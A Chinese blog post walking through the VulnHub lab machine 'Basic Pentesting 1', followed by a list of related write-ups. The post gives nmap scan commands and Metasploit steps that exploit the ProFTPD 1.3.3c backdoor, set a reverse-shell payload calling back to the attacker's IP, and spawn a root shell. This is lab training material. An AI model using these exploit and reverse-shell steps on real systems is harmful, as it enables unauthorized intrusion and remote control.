Basic penetration1

于 2024-09-28 09:00:00 发布
阅读量293 收藏 1
点赞数 9
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78080214/article/details/142602083
版权

下载地址

https://www.vulnhub.com/entry/basic-pentesting-1,216/

信息收集

主机探测

arp-scan -l

端口扫描

nmap -sS -sV -sC -O -T5 -p- 192.168.0.140

网站探测

发现网站没有什么有用的东西,就再换换思路

漏洞探测

后渗透

在端口扫描发现ProFTPD 1.3.3c 这个版本是有漏洞的

在kali输入 msfconsole命令,进入到该框架内

##这里用到msfconsole,关于msfconsole介绍:msfconsole又叫MSF终端、The Mctasploit Framework,是目前Metasploit框架最流行的用户接口。

 msfconsole

先看看可以利用的脚本,输入 search proftpd 1.3.3

search proftpd 1.3.3

选择用序号2的那一个:use 2;然后查看要设置的参数(show options),使用方法如下:

use 2
show options

设置一下RHOSTS(目标的地址),输入

set RHOSTS 192.168.0.140

设置payload,输入set payload cmd/unix/reverse(反向连接)

set payload cmd/unix/reverse

查看backdoor需要的参数:show options,发现还需要设置一个监听的地址

show options

设置LHOST:set LHOST 192.168.101.10(kali的ip)

set LHOST 192.168.0.132

参数设置完成后,输入run,执行攻击,成功进入getshell

run

漏洞利用

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看当前用户拥有的权限:sudo -l,发现当前用户已经是root

whoami
sudo -l
id

sloth..
关注
Basic penetration靶机
2301_80154010的博客
09-27 112
利用sudo 提权发现需要密码,但是发现 /etc/shadow 是可以读的。利用msf的模块来getshell,启动msf,成功 getshell。此时可以切换到这个用户,再sudu su 到root用户。往下翻到一个login界面,尝试弱口令。发现一个 用户 和加密后的密码。先转变为交互式的shell。
vulnhub/Basic Penetration
qq_45230030的博客
04-29 184
日常打靶其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143。
Basic-penetration靶机
zdd1453691081的博客
08-04 151
(1)ip扫描
漏洞复现 -- Basic penetration
2301_80854251的博客
06-28 221
漏洞复现 -- Basic penetration
Vulnhub靶机 Basic penetration(渗透测试详解)
2301_78721909的博客
08-03 113
使用searchsploit工具搜索该版本的历史漏洞,发现存在命令执行漏洞。根据nmap的扫描结果发现ftp的版本为。2、对靶机IP进行主机发现和端口扫描。发现开放了21、22、80端口。成功获取root权限。
Basic-penetration靶机渗透测试
weixin_58786230的博客
08-04 232
【代码】Basic-penetration靶机渗透测试。
basic_pentesting_1靶机的信息收集技术和漏洞扫描技术学习运用
zyzy0512的博客
07-01 1590
打开kali输入ifconfig回车,如图1.1所示。
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 764
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
【技巧总结】Penetration Test Engineer[1]-Basic
weixin_30932215的博客
09-29 136
1、渗透测试基础 1.1、渗透测试分类 黑盒测试:从远程网络位置来评估目标网络基础设施,没有任何相关信息 白盒测试:内部发起,了解到关于目标环境的所有内部与底层知识 灰盒测试:结合两者优势,根据对目标系统所掌握的有限知识与信息,来选择评估整体安全性的最佳途径 1.2、渗透测试方法与流程 OSSTMM安全测试方法学开源手册 NISTSP800-42网络安全测试指南 OWASP十大We...
Hacking Basic Security Penetration Testing and How to Hack mobi
09-24
Hacking Basic Security Penetration Testing and How to Hack 英文mobi 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
Hacking Basic Security Penetration Testing and How to Hack 无水印pdf
09-24
Hacking Basic Security Penetration Testing and How to Hack 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载...
Hacking How to Hack Computers, Basic Security and Penetration Testing epub
03-27
Hacking How to Hack Computers, Basic Security and Penetration Testing 英文epub 本资源转载自网络,如有侵权,请联系上传者或csdn删除 查看此书详细信息请在美国亚马逊官网搜索此书
Hacking Basic Security, Penetration Testing and How to Hack 无水印pdf
09-24
Hacking Basic Security, Penetration Testing and How to Hack 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8472
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于matlab平抑风电波动的电-氢混合储能容量优化配置【含Matlab源码 期】.zip
09-27
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
dynamic_unet-0.0.2-py3-none-any.whl
最新发布
09-27
dynamic_unet-0.0.2-py3-none-any.whl
基于Java语言的动态二维码生成与绘制设计源码
09-27
该项目是一款基于Java语言的动态二维码生成与绘制设计源码,包含126个文件,包括64个JAR包、24个PNG图片、17个GIF动画、10个XML配置、7个Java源文件、2个Markdown文件、1个Idea项目配置文件和1个JPG图片文件。该项目通过图像生成动态二维码,适用于需要动态二维码绘制的场景。
Penetration Test
07-23
渗透测试,也被称为渗透评估或黑客审计,是一种网络安全检查方法,它模拟攻击者试图非法进入系统或网络的过程。这种测试旨在发现系统的漏洞、弱点和安全缺陷,帮助组织提前识别并修复这些问题,提高其安全性。 渗透测试通常分为几个阶段: 1. **信息收集**:研究人员会收集公开可用的信息,如网站架构、网络拓扑等,作为攻击的基础。 2. **漏洞扫描**:通过自动化工具检测已知的安全漏洞。 3. **社会工程学**:利用人性的弱点获取内部信息。 4. **权限提升**:尝试逐步获取更高权限,比如登录账户、访问数据等。 5. **报告编写**:提交测试结果,包括发现的问题和建议的改进措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值